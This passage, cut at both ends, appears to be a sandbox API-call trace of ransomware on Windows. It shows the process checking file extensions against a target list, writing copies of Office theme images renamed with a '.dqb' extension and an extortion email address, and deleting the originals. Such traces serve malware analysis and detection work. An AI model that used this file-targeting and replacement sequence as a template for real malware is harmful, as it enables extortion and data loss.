(lpString=".1cd") returned 4 [0041.288] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.288] lstrlenW (lpString=".jpg") returned 4 [0041.288] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.288] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0041.288] lstrlenW (lpString="Garden.jpg") returned 10 [0041.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.289] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=23871) returned 1 [0041.289] CloseHandle (hObject=0x208) returned 1 [0041.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0041.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.289] lstrlenW (lpString=".doc") returned 4 [0041.289] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.289] lstrlenW (lpString=".docx") returned 5 [0041.289] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0041.289] lstrlenW (lpString=".pdf") returned 4 [0041.289] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.289] lstrlenW (lpString=".xls") returned 4 [0041.289] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.289] lstrlenW (lpString=".xlsx") returned 5 [0041.289] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0041.289] lstrlenW (lpString=".ppt") returned 4 [0041.289] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.289] lstrlenW (lpString=".zip") returned 4 [0041.289] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.289] lstrlenW (lpString=".rar") returned 4 [0041.289] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString=".bz2") returned 4 [0041.290] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.290] lstrlenW (lpString=".7z") returned 3 [0041.290] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString=".dbf") returned 4 [0041.290] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString=".1cd") returned 4 [0041.290] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString=".jpg") returned 4 [0041.290] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString=".doc") returned 4 [0041.290] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.290] lstrlenW (lpString=".docx") returned 5 [0041.290] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0041.290] lstrlenW (lpString=".pdf") returned 4 [0041.290] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString=".xls") returned 4 [0041.290] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString=".xlsx") returned 5 [0041.290] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0041.290] lstrlenW (lpString=".ppt") returned 4 [0041.290] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.290] lstrlenW (lpString=".zip") returned 4 [0041.290] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString=".rar") returned 4 [0041.290] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.290] lstrlenW (lpString=".bz2") returned 4 [0041.290] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.290] lstrlenW (lpString=".7z") returned 3 [0041.290] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.291] lstrlenW (lpString=".dbf") returned 4 [0041.291] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.291] lstrlenW (lpString=".1cd") returned 4 [0041.291] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.291] lstrlenW (lpString=".jpg") returned 4 [0041.291] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.291] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0041.291] lstrlenW (lpString="Genko_1.emf") returned 11 [0041.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.917] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=5524) returned 1 [0042.917] CloseHandle (hObject=0x17c) returned 1 [0042.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0042.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".doc") returned 4 [0042.918] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.918] lstrlenW (lpString=".docx") returned 5 [0042.918] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.918] lstrlenW (lpString=".pdf") returned 4 [0042.918] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString=".xls") returned 4 [0042.918] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString=".xlsx") returned 5 [0042.918] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.918] lstrlenW (lpString=".ppt") returned 4 [0042.918] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".zip") returned 4 [0042.918] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString=".rar") returned 4 [0042.918] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString=".bz2") returned 4 [0042.918] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.918] lstrlenW (lpString=".7z") returned 3 [0042.918] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".dbf") returned 4 [0042.918] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".1cd") returned 4 [0042.918] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".jpg") returned 4 [0042.918] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.918] lstrlenW (lpString=".doc") returned 4 [0042.918] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.919] lstrlenW (lpString=".docx") returned 5 [0042.919] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.919] lstrlenW (lpString=".pdf") returned 4 [0042.919] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.919] lstrlenW (lpString=".xls") returned 4 [0042.919] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.919] lstrlenW (lpString=".xlsx") returned 5 [0042.919] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.919] lstrlenW (lpString=".ppt") returned 4 [0042.919] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.919] lstrlenW (lpString=".zip") returned 4 [0042.919] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.919] lstrlenW (lpString=".rar") returned 4 [0042.919] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.919] lstrlenW (lpString=".bz2") returned 4 [0042.919] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.919] lstrlenW (lpString=".7z") returned 3 [0042.919] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.919] lstrlenW (lpString=".dbf") returned 4 [0042.919] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.919] lstrlenW (lpString=".1cd") returned 4 [0042.919] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.919] lstrlenW (lpString=".jpg") returned 4 [0042.919] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.919] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0042.919] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.234] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2985) returned 1 [0043.234] CloseHandle (hObject=0x17c) returned 1 [0043.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 0x20 [0043.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.234] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.234] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.484] GetLastError () returned 0x0 [0043.484] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xba9, lpOverlapped=0x0) returned 1 [0043.486] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xbb0, lpOverlapped=0x0) returned 1 [0043.487] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.487] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.487] SetEndOfFile (hFile=0x178) returned 1 [0043.487] CloseHandle (hObject=0x178) returned 1 [0043.487] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.487] SetEndOfFile (hFile=0x17c) returned 1 [0043.488] CloseHandle (hObject=0x17c) returned 1 [0043.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.488] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1 [0043.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.488] lstrlenW (lpString=".doc") returned 4 [0043.488] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.488] lstrlenW (lpString=".docx") returned 5 [0043.488] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.488] lstrlenW (lpString=".pdf") returned 4 [0043.488] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.488] lstrlenW (lpString=".xls") returned 4 [0043.488] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.488] lstrlenW (lpString=".xlsx") returned 5 [0043.488] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.489] lstrlenW (lpString=".ppt") returned 4 [0043.489] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString=".zip") returned 4 [0043.489] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString=".rar") returned 4 [0043.489] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString=".bz2") returned 4 [0043.489] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.489] lstrlenW (lpString=".7z") returned 3 [0043.489] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString=".dbf") returned 4 [0043.489] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString=".1cd") returned 4 [0043.489] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString=".jpg") returned 4 [0043.489] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.489] lstrlenW (lpString=".doc") returned 4 [0043.489] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.489] lstrlenW (lpString=".docx") returned 5 [0043.489] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.489] lstrlenW (lpString=".pdf") returned 4 [0043.489] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString=".xls") returned 4 [0043.489] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString=".xlsx") returned 5 [0043.489] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.489] lstrlenW (lpString=".ppt") returned 4 [0043.489] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.490] lstrlenW (lpString=".zip") returned 4 [0043.490] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.490] lstrlenW (lpString=".rar") returned 4 [0043.490] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.490] lstrlenW (lpString=".bz2") returned 4 [0043.490] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.490] lstrlenW (lpString=".7z") returned 3 [0043.490] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.490] lstrlenW (lpString=".dbf") returned 4 [0043.490] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.490] lstrlenW (lpString=".1cd") returned 4 [0043.490] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0043.490] lstrlenW (lpString=".jpg") returned 4 [0043.490] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.490] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.490] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.491] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1363) returned 1 [0043.491] CloseHandle (hObject=0x17c) returned 1 [0043.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20 [0043.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0043.491] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.492] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.493] GetLastError () returned 0x0 [0043.493] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x553, lpOverlapped=0x0) returned 1 [0043.494] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x560, lpOverlapped=0x0) returned 1 [0043.495] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.495] WriteFile (in: hFile=0x178, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.495] SetEndOfFile (hFile=0x178) returned 1 [0043.495] CloseHandle (hObject=0x178) returned 1 [0043.496] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.496] SetEndOfFile (hFile=0x17c) returned 1 [0043.496] CloseHandle (hObject=0x17c) returned 1 [0043.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.497] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 1 [0043.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.497] lstrlenW (lpString=".doc") returned 4 [0043.497] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.497] lstrlenW (lpString=".docx") returned 5 [0043.497] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.497] lstrlenW (lpString=".pdf") returned 4 [0043.497] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.497] lstrlenW (lpString=".xls") returned 4 [0043.497] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.497] lstrlenW (lpString=".xlsx") returned 5 [0043.497] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.497] lstrlenW (lpString=".ppt") returned 4 [0043.497] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0043.497] lstrlenW (lpString=".zip") returned 4 [0043.497] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.497] lstrlenW (lpString=".rar") returned 4 [0043.497] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.497] lstrlenW (lpString=".bz2") returned 4 [0043.497] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.497] lstrlenW (lpString=".7z") returned 3 [0043.497] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.497] lstrlenW (lpString="C:\\Program Files\\Common 